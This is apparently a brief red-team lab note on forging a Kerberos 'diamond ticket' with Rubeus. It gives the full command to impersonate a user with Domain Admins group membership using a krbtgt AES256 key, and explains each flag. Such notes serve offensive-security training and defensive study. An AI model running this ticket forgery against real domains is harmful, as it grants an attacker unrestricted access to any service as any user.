Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user.

Create Diamond Ticket

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap

/tgtdeleg uses the Kerberos GSS-API to obtain a usable TGT for the current user without needing to know their password or NTLM/AES hash, and without requiring elevation on the host.

/ticketuser is the username of the user to impersonate.

/ticketuserid is the domain RID of that user.

/groups are the desired group RIDs (512 being Domain Admins).

/krbkey is the krbtgt AES256 hash (obtained earlier; see KRBTGT secrets).
